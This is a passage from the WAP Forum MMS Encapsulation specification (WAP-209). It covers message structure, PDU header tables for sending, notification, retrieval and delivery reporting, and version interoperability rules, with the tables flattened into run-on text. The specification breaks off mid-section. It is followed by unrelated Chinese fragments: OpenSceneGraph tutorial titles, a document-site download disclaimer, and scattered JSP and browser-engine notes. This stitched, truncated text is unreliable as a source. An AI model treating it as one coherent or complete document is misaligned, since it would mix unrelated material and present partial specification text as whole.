information.WAP Forum™ members have agreed to use reasonable endeavors to disclose in a timely manner to the WAP Forum the existence of all intellectual property rights (IPR's) essential to the present document. The members do not have an obligation to conduct IPR searches. This information is publicly available to members and non-members of the WAP Forum and may be found on the "WAP IPR Declarations" list at /what/ipr.htm. Essential IPR is available for license on the basis set out in the schedule to the WAP Forum Application Form.No representations or warranties (whether express or implied) are made by the WAP Forum™ or any WAP Forum member or its affiliates regarding any of the IPR's represented on this list, including but not limited to the accuracy, completeness, validity or relevance of the information or whether or not such rights are essential or non-essential.This document is available online in PDF format at /.Known problems associated with this document are published at /.Comments regarding this document can be submitted to the WAP Forum™ in the manner published at/.Document HistoryWAP-209-MMSEncapsulation-20010601-a CurrentContents1. SCOPE (5)2. REFERENCES (6)2.1. N ORMATIVE R EFERENCES (6)2.2. I NFORMATIVE R EFERENCES (6)3. TERMINOLOGY AND CONVENTIONS (7)3.1. C ONVENTIONS (7)3.2. D EFINITIONS (7)3.3. A BBREVIATIONS (7)4. INTRODUCTION (9)5. MESSAGE STRUCTURE OVERVIEW (10)6. MMS PROTOCOL DATA UNITS AND FIELDS (11)6.1. S ENDING OF M ULTIMEDIA M ESSAGE (11)6.1.1. Send Request (11)6.1.2. Send confirmation (13)6.2. M ULTIMEDIA M ESSAGE N OTIFICATION (14)6.3. R ETRIEVAL O F M ULTIMEDIA M ESSAGE (16)6.4. D ELIVERY A CKNOWLEDGEMENT (18)6.5. D ELIVERY R EPORTING (18)6.6. R EAD R EPORTING (19)6.7. E RROR C ONSIDERATIONS (19)6.7.1. Interoperability Considerations with Version Numbering (19)6.7.2. Interoperability between MMS Versions with the Same Major Version Number (19)6.7.3. Interoperability between MMS Versions with Different Major Version Numbers (20)7. BINARY ENCODING OF PROTOCOL DATA UNITS (21)7.1. E NCODING R ULES (21)7.2. H EADER E NCODING (22)7.2.1. Bcc field (22)7.2.2. Cc field (22)7.2.3. Content-Location field (22)7.2.4. Content-Type field (23)7.2.5. Date field (23)7.2.6. Delivery-Report field (23)7.2.7. Delivery-Time field (23)7.2.8. Delta-seconds-value (23)7.2.9. Encoded-string-value (23)7.2.10. Expiry field (23)7.2.11. From field (24)7.2.12. Message-Class field (24)7.2.13. Message-ID field (24)7.2.14. Message-Type field (24)7.2.15. Message-Size field (25)7.2.16. MMS-Version field (25)7.2.17. Priority field (25)7.2.18. Read-Reply field (25)7.2.19. Report-Allowed field (26)7.2.20. Response-Status field (26)7.2.21. Response-Text field (27)7.2.22. Sender-Visi bility field (27)7.2.23. Status field (27)7.2.24. Subject field (27)7.2.25. To field (27)7.2.26. Transaction-Id field (27)7.3. A SSIGNED N UMBERS (28)8. MMS ADDRESSING MODEL (30)APPENDIX A. STATIC CONFORMANCE REQUIREMENTS (NORMATIVE) (32)APPENDIX B. CHANGE HISTORY (INFORMATIVE) (38)1. ScopeThe Wireless Application Protocol (WAP) is a result of continuous work to define an industry-wide specification for developing applications that operate over wireless communication networks. The scope for the WAP Forum is to define a set of specifications to be used by service applications. The wireless market is growing very quickly, and reaching new customers and services. To enable operators and manufacturers to meet the challenges in advanced services, differentiation and fast/flexible service creation WAP Forum defines a set of protocols in transport, security, transaction, session and application layers. For additional information on the WAP architecture, please refer to “Wireless Application Protocol Architecture Specification” [WAPARCH].Multimedia Messaging Service (MMS) is a system application by which a WAP client is able to provide a messaging operation with a variety of media types. The service is described in terms of actions taken by the WAP MMS Client and its service partner, the MMS Proxy-Relay, a device which operates as a WAP Origin Server for this specialised service.The service description of the multimedia messaging service can be found in [MMSSERV]. This specification defines the message encapsulation, i.e., the message structure and encodings for the multimedia messaging service.2. References2.1. Normative References[CREQ] “Specification of WAP Conformance Requirements”, WAP-221-CREQ, WAP Forum™.URL:http///[RFC2119] “Key words for use in RFCs to Indicate Requirement Levels”. S. Bradner. March 1997.URL:/rfc/rfc2119.txt[RFC2396] "Uniform Resource Identifiers (URI): G eneric Syntax", T. Berners-Lee, et al., August 1998.URL: /rfc/rfc2396.txt.[RFC2045] "Multipurpose Internet Mail Extensions (MIME) Part One: Format of Internet Message Bodies", Freed N., November 1996. URL: ftp:///in-notes/rfc2045.txt.[RFC2046] "Multipurpose Internet Mail Extensions (MIME) Part Two: Media Types", Freed N., November1996. URL: ftp:///in-notes/rfc2046.txt.[RFC2047] "Multipurpose Internet Mail Extensions (MIME) Part Three: Message Header Extensions forNon-ASCII Text", Moore K., November 1996. URL: ftp:///in-notes/rfc2047.txt.[RFC2234] "Augmented BNF for Syntax Specifications: ABNF", Crocker D., Overell P., November 1997.URL: ftp:///in-notes/rfc2234.txt.[RFC2387] “The MIME Multipart/related content type”, Levinson E., August 1998. URL:ftp:///in-notes/rfc2387.txt[RFC2392] "Content-ID and Message-ID Uniform Resource Locators", Levinson E., August 1998. URL:ftp:///in-notes/rfc2392.txt[RFC2616] "Hypertext Transfer Protocol HTTP/1.1", Fielding R., Gettys J., Mogul J., Frystyk H., Masinter L., Leach P., Berners-Lee T., June 1999. URL: ftp:///in-notes/rfc2616.txt[RFC822] "Standard for the Format of ARPA Internet Text Messages", Crocker D., August 1982. URL:ftp:///in-notes/rfc822.txt[WAPWSP] "Wireless Application Protocol, Wireless Session Protocol Specification", WAP-203-WSP, WAP Forum™. URL: .2.2. Informative References[WAPARCH] “WAP Architecture”, WAP-100-Arch, WAP Forum™. URL:http/// [MMSSERV] "Wireless Application Protocol, MMS Client Transactions", WAP-206-MMSCTR, WAPForum™. URL: .[PPG] "Wireless Application Protocol, Push Proxy Gateway Service Specification", WAP-151-PPG,WAP Forum™. URL: .[SMIL] "Synchronized Multimedia Integration Language (SMIL) Boston Specification", W3C, WorkingDraft SMIL 2.0 September 2000. URI: /TR/smil20/ [TS22140] “Multimedia Messaging Service: Service aspects; Stage 1”, 3rd Generation Partnership Project TS 22.140 Release 1999. URL: /ftp/Specs/[TS23140] “Multimedia Messaging Service: Functional description; Stage 2”, 3rd Generation Partnership Project TS 23.140 Release 1999. URL: /ftp/Specs/[WML] "Wireless Application Protocol, Wireless Markup Language Specification, Version 1.3", WAP-191-WML, WAP Forum™. URL: .3. Terminology and Conventions3.1. ConventionsThe key words “MUST”, “MUST NOT”, “REQUIRED”, “SHALL”, “SHALL NOT”, “SHOULD”, “SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” in this document are to be interpreted as described in [RFC2119]. All sections and appendixes, except “Scope” and “Introduction”, are normative, unless they are explicitly indicated to be informative.3.2. DefinitionsThis section introduces a terminology that will be used throughout this document.Multimedia Messaging Service (MMS)A system application by which a WAP client is able to provide a messaging operation with a variety of mediatypes.MMS EncapsulationThe definition of the protocol data units, the fields and their encodings necessary to send and receivemultimedia messages including multimedia objects.MMS Proxy-RelayA server which provides access to various messaging systems. It may operate as WAP origin server in whichcase it may be able to utilise features of the WAP system.MMS ClientThe MMS service endpoint located on the WAP client device.MMS TerminalA mobile station (MS, terminal) that implements the MMS Client to provide the MMS service.MMS Originating TerminalThe MMS Terminal which sends a multimedia message.MMS Recipient TerminalThe MMS Terminal which receives a multimedia message.3.3. AbbreviationsFor the purposes of this specification the following abbreviations apply.HTTP Hypertext Transfer ProtocolIPv4Internet Protocol version 4IPv6Internet Protocol version 6MIME Multipurpose Internet Mail Extensi onsMM Multimedia MessageMMS Multimedia Messaging ServiceMS Mobile Station, TerminalPDU Protocol Data UnitPLMN Public Land Mobile NetworkSMIL Synchronized Multimedia Integration Language RFC Request For CommentsURI Uniform Resource IdentifierWAP Wireless Application ProtocolWINA WAP Interim Naming AuthorityWML Wireless Markup LanguageWSP Wireless Session Protocol4. IntroductionThis section is informative.This paper describes the content and encodings of the protocol data units (PDUs) for the mult imedia messaging service.In multimedia messaging service the WAP WSP/HTTP is used to transfer multimedia messages between the terminal (MS) and the MMS Proxy-Relay. The WSP session management and the related capability negotiation mechanisms as well as security functions are out of the scope of this document.There are basically eight types of PDUs in MMS level:• Send message to MMS Proxy-Relay(M-Send.req, M-Send.conf)• Fetch message from MMS Proxy-Relay (WSP/HTTP GET.req, M-Retrieve.conf)• MMS Notification about new message (M-Notification.ind, M-NotifyResp.ind)• Delivery Report about sent message (M-Delivery.ind)• Acknowledgement of message delivery (M-Acknowledge.req)Logically the PDU consists of headers and a multipart body. The multipart body is present only as a sent multimedia message and a successfully fetched message. Some of the headers originate from standard RFC 822 headers and others are specific to the multimedia messaging.According to WSP definitions, comma separated lists of header field values are coded as multiple headers with identical name. If the headers are converted from binary encoding to textual format, several header fields with the same name are combined into a comma separated list, and vice versa. The order of the header fields is preserved.The textual format of the headers is that defined in [RFC822] and [RFC2616]. Binary encoding is similar to WSP header encoding [WAPWSP]. In this specification, values for header fields and parameter names are assigned.5. Message Structure OverviewThe multimedia messaging PDUs consists of MMS headers and a message body. The message body may contain any content type, including preassigned content types defined in [WAPWSP]. The MIME multipart [RFC2045-7] is used in email systems and are therefore compatible. The content type of the PDUs is application/vnd.wap.mms-message.The WSP content type application/vnd.wap.multipart.related content type provides a good example how multimedia content and presentation information can be encapsulated to a single message. Figure 1 depicts the conceptual model and example of the encapsulation.application/vnd.wap.mms-messageFigure 1. Model of MMS data encapsulationThe mms-headers contain MMS-specific information of the PDU. This information contains mainly informati on how to transfer the multimedia message from originating terminal to the recipient terminal.In the multimedia messaging use case, the message body consists of multipart/related structure [RFC2387] including multimedia objects, each in separate part, as well as optional presentation part. The order of the parts has no significance. The presentation part contains instructions how the multimedia content should be rendered to the display and speakers etc, on the terminal. There MAY be multiple presentation parts, but one of them MUST be the root part. In case of multipart/related, the root part is pointed from the Start parameter.If the presentation part does not exist, it is up to the implementation of the terminal how the multimedia content is presented. Examples of the presentation techniques are SMIL [SMIL] and WML [WML].The message body is used only when the multimedia message is sent or retrieved. All other PDUs contain only the mms-headers part. The message can contain various multimedia parts. Figure 1 shows just one possibility.All the content types are subject to WINA/IANA registration.6. MMS Protocol Data Units and FieldsThe header fields for sending, notification, retrieving, reporting and acknowledging of a multimedia message are described in the Tables 1-7. The names of the fields that do not originate from [RFC822] are preceded by X-Mms-. The MMS Protocol Data Units MAY contain additional Header fields such as found in standard [RFC822] headers which are not explicitly referenced in this docum ent.6.1. Sending of Multimedia MessageThe sending of the multimedia message consists of two messages: M-Send.req and M-Send.conf. The transaction identifier is created and used by the sending client and it is unique within the send transaction only.6.1.1. Send RequestThis chapter describes messages sent by the MS to the MMSProxy-Relay, and those headers generated by the sender's MMS Proxy-Relayand added to the headers generated by the client. These headers are used to generate the MMS notification to the recipient, and are delivered with the message body parts to the recipient at retrieval.In addition to the following tokens described in the table below, it is also possible to provide header extendability using WSP mechanism of encoding of a new unassigned header field nameName Content CommentsX-Mms-Message-Type Message-type-value =m-send-req Mandatory.Specifies the transaction type.X-Mms-Transaction-ID Transaction-id-value Mandatory.A unique identifier for the message. This transaction IDidentifies the M-Send.req and the corresponding replyonly.X-Mms-MMS-Version MMS-version-value Mandatory.The MMS version number. According to thisspecification, the version is 1.0Date Date-value Optional.Arrival time of the message at MMSProxy-Relay. MMSProxy-Relaywill generate this field when not supplied byterminal.From From-value Mandatory.Address of the message sender. This field MUST bepresent in a message delivered to a recipient. Thesending client MUST send either its address or insert-an-address token. In case of token, the MMS Proxy-RelayMUST insert the correct address of the sender.To To-value Optional1.1 At least one of these address fields (To, Cc or Bcc) MUST be present.Address of the recipient. Addressing is handled inChapter 8.Any number of address fields allowed.Cc Cc-value Optional1.Address of the recipient. Addressing is handled inChapter 8.Any number of address fields allowed.Bcc Bcc-value Optional1.Address of the recipient. Addressing is handled inChapter 8.Any number of address fields allowed.Subject Subject-value Optional.Subject of the message.X-Mms-Message-Class Message-class-value Optional.Class of the message. Value Auto indicates a messagethat is automatically generated by the client. If theMessage-Class is Auto, the originating terminal SHALLNOT request Delivery-Report or Read-Report.If field is not present, the receiver inteprets the messageas personal.X-Mms-Expiry Expiry-value Optional, default: maximum.Length of time the message will be stored in MMSProxy-Relayor time to delete the message. The field hastwo formats, either absolute or interval.X-Mms-Delivery-Time Delivery-time-value Optional: default: immediate.Time of desired delivery. Indicates the earliest possibledelivery of the message to the recipient. The field hastwo formats, either absolute or interval.X-Mms-Priority Priority-value Optional. Default: Normal.Priority of the message for the recipient.X-Mms-Sender-Visibility Sender-visibility-value Optional. Default: show address/phone number of thesender to the recipient unless the sender has a secretnumber/address.Hide = don't show any address. Show = show even secretaddress.X-Mms-Delivery-Report Delivery-report-value Optional. Default determined when service is ordered.Specifies whether the user wants a delivery report fromeach recipient. When Message-Class is Auto, the fieldSHALL always be present and the value SHALL be No.X-Mms-Read-Reply Read-reply-value Optional.Specifies whether the user wants a read report from eachrecipient as a new message. When Message-Class isAuto, the field SHALL always be present and the valueSHALL be No.Content-Type Content-type-value Mandatory.The content type of the message.Table 1. Headers of M-Send.req messageApplication-specific headers in M-Send.req provide technology that allows the use of application-specific extensions for multimedia messaging service which allows, e.g., the use of additional RFC-822 headers.The message body follows the headers.When the content type application/vnd.wap.multipart.related [RFC2387] is used and if the Start parameter in the related structure is present, it MUST point to the presentation part of the multimedia message. If the Start parameter is not present, the presentation part, if present at all, M UST be the first part in the multipart structure.6.1.2. Send confirmationWhen the MMS Proxy-Relayhas received the Send request, it sends a response message back to the MS indicating the status of the operation. The response message contains a the mms-headers only.X-Mms-Message-Type Message-type-value = m-send-conf Mandatory.Identifies the message type.X-Mms-Transaction-ID Transaction-id-value Mandatory.This transaction ID identifies the M-Send.conf and thecorresponding request only.X-Mms-MMS-Version MMS-version-value Mandatory.The MMS version number. According to thisspecification, the version is 1.0X-Mms-Response-Status Response-status-value Mandatory.MMS specific status.X-Mms-Response-Text Response-text-value Optional.Description which qualifies the response status value. Message-ID Message-ID-value Optional.This is a unique reference assigned to message. This IDSHALL always be present when the MMS Proxy-Relayaccepted the message.The ID enables a client to match delivery reports withpreviously sent messages.Table 2. M-Send.conf message.The MMS Proxy-Relay MUST always assign a message ID to the message when successfully received for delivery. The message ID shall be globally unique according to the needs of the MMS Proxy-Relaythat receives the multimedia message for delivery.6.2. Multimedia Message NotificationMMS Notifications inform the MS about the contents a received message. The MMS Notification message consists only of MMS headers. No other parts are present. The purpose of the notification is to allow the client to automatically fetch a MM from the location indicated in the notification.The transaction identifier is created by the MMS Proxy-Relayand it is unique up to the following M-NotifyResp only. If the MMS Client requests deferred delivery with M-NotifyResp, the MMS Proxy-RelayMAY create a new transaction identifier.X-Mms-Message-Type Message-type-value =m-notification-ind Mandatory.Specifies the transaction type.X-Mms-Transaction-ID Transaction-id-value Mandatory.Identifies the notification and the subsequent transactionthat is closed by the following M-NotifyResp.X-Mms-MMS-Version MMS-version-value Mandatory.The MMS version number. According to thisspecification, the version is 1.0.From From-value Optional.Address of the sender. If hiding the address of the senderfrom the recipient is supported, the MMS Proxy-Relaywill not add this field to a message header.Subject Subject-value Optional.Subject of the message.X-Mms-Message-Class Message-class-value Mandatory.Class of the message.X-Mms-Message-Size Message-size-value Mandatory.Full size of message in octets.X-Mms-Expiry Expiry-value Mandatory.Length of time the message will be available. The fieldhas only one format, interval.X-Mms-Content-Location Content-location-value Mandatory.This field defines the location of the message.Table 3. M-Notification.ind message.The standard URI format SHALL be used [RFC2396], for example:http://mmsc/message-idThe confirmation of the notification is presented in Table 4. The purpose of the confirmation is to acknowledge the transaction to the MMSProxy-Relay.X-Mms-Message-Type Message-type-value = m-notifyresp-ind Mandatory.Identifies the message type.X-Mms-Transaction-ID Transaction-id-value Mandatory.Identifies the transaction started by M-Notification.X-Mms-MMS-Version MMS-version-value Mandatory.The MMS version number. According to thisspecification, the version is 1.0X-Mms-Status Status-value Mandatory.Message status. The status Retrieved SHALL be usedonly after successful retrieval of multimedia message.X-Mms-Report-Allowed Report-allowed-value Optional. Default: Yes.Sending of delivery report allowed to the user or not.Table 4. M-NotifyResp.ind message.6.3. Retrieval Of Multimedia MessageA client SHALL retrieve messages by sending a WSP/HTTP GET request to the MMS Proxy-Relay containing a URI to the received message.When successful, the response to the retrieve request will contain headers and the body of the incoming message. Name Content CommentsX-Mms-Message-Type Message-type-value =m-retrieve-conf Mandatory.Specifies the message type.X-Mms-Transaction-ID Transaction-id-value Optional.Identifies either the transaction that has been started byM-Notification without M-NotifResp or new transactionwhen deferred delivery was requested. The newtransaction ID is optional.X-Mms-MMS-Version MMS-version-value Mandatory.The MMS version number. According to thisspecification, the version is 1.0.Message-ID Message-ID-value Optional.This is an unique reference assigned to message. This IDSHALL always be present when the originator clientrequested a read reply.The ID enables a client to match read reports withpreviously sent messages.Date Date-value Mandatory.Sending date and time.From From-value Optional.Address of the sender. If hiding the address of the senderfrom the recipient is supported, the MMS Proxy-Relaywill not add this field to a message header.To To-value Optional.Address of the recipient. Addressing will be handled inChapter 8.Any number of address fields allowed.Cc Cc-value Optional.Address of the recipient. Addressing will be handled inChapter 8.Any number of address fields allowed.Subject Subject-value Optional.Message subjectX-Mms-Message-Class Message-class-value Optional.Message class. If field is not present, the receiverinteprets the message as personal.X-Mms-Priority Priority-value Optional. Default: NormalPriority of the message.X-Mms-Delivery-Report Delivery-report-value Optional. Default: No.Specifies whether the user wants a delivery report fromeach recipient.X-Mms-Read-Reply Read-reply-value Optional. Default: No.Specifies whether the user wants a read report from eachrecipient as a new message.Content-Type Content-type-value Mandatory.The content type of the message.Table 5. Headers of M-Retrieve.conf message.Application-specific headers in M-Retrieve.conf provide technology that allows the use of application-specific extensions for multimedia messaging service which allows, e.g., the use of additional RFC-822 headers.The message body follows the headers.When the content type application/vnd.wap.multipart.related [RFC2387] is used and if the Start parameter in the related structure is present, the client SHOULD expect it to point to the presentation part of the multimedia message.6.4. Delivery AcknowledgementA MMS Acknowledge message confirms the delivery of the message from the receiving terminal to the MMS Proxy-Relay.Name Content CommentsX-Mms-Message-Type Message-type-value = m-acknowledge-ind Mandatory.Identifies the transaction type.X-Mms-Transaction-ID Transaction-id-value Mandatory.This is the transaction number that originates fromimmediately previous M-Retrieve operation.X-Mms-MMS-Version MMS-version-value Mandatory.The MMS version number. According to thisspecification, the version is 1.0X-Mms-Report-Allowed Report-allowed-value Optional. Default: Yes.Sending of delivery report allowed to the user.Table 6. M-Acknowledge.ind message.6.5. Delivery ReportingA MMS Delivery Report MUST be sent from the MMS Proxy-Relay to the originating MS when the originator has requested a delivery report and the recipient has not explicitly requested for denial of the report. As for example, the recipient can request for denial of the Delivery Report by using the X-Mms-Report-Allowed field of M-Acknowledge.ind or M-NotifyResp.ind message. There will be a separate delivery report from each recipient. There is no response message to the delivery report.Name Content CommentsX-Mms-Message-Type Message-type-value = m-delivery-ind Mandatory.Identifies the PDU type.X-Mms-MMS-Version MMS-version-value Mandatory.The MMS version number. According to thisspecification, the version is 1.0Message-ID Message-ID-value Mandatory.Identifier of the message. From Send request, connectsdelivery report to sent message in MS.To To-value Mandatory.Needed for reporting in case of point-to-multipointmessage.Date Date-value Mandatory.Date and time the message was handled (fetched,expired, etc.) by the recipient or MMSProxy-Relay.X-Mms-Status Status-value Mandatory.The status of the message.Table 7. M-Delivery.ind message.6.6. Read ReportingWhen the originating terminal requested the Read-Reply in the multimedia message, the recipient terminal MAY send a new multimedia message back to the originating terminal when the user has read the multimedia message. The content of the multimedia message is a terminal implementation issue. The read-reply multimedia message MUST have the Message-Class as Auto in the message.The MMS Proxy-Relay MUST deliver the read-reply message as ordinary multimedia message.When the originating terminal receives the Read-Reply, it SHALL NOT create delivery report or read-reply message.6.7. Error Considerations6.7.1. Interoperability Considerations with Version NumberingThe MMS version number is divided into two parts: major version number and minor version number. MMS versions with only minor version number differences SHALL provide full backward compatibility. MMS versions with major version number differences SHALL NOT provide backward compatibility.6.7.2. Interoperability between MMS Versions with the Same Major VersionNumberThe following rules SHALL be followed between different MMS versions having the same major version number but different minor version number.。
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第十三讲:碰撞检测(下) FreeSouth
第二讲:环境的搭建 FreeSouth
第三讲:osgViewer应用基础(上) FreeSouth
事件管理 osgGA main
基于事件的 小应用 EventHandler
创建线程,类似 windows中的 _beginthread
创建互斥 类似windows中 的CreateMutex, 用于针对多个线 程访问同一资源 情况
创建条件 ,用于符合条件 时才启动某个线 程,使用Mutex 实现
ReadNode writeObject ….
第二十一 讲:应用-文件读取进度 FreeSouth
以二进制取出 文件
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
3.一个纯的html页面不能算是严格意义上的jsp页面,必须要加入jsp 元素或者是java代码的页面才算是严格意义上的jsp页面。
<%@ page language="java" import="java.util.* "pageEncoding="UTF-8"%> 此句代码就是在说明可以引入java代码,而且还导入的util类。
jsp页面,同样包括静态的包含文件(是否是<%@ include %>)。
javax.servlet.jsp.*;javax.servlet.http.* 6.forward
用的是trident,非IE类的浏览器都采用的是Webkit,Webkit 要比trident解析的要快些,也要更靠近html标准一些。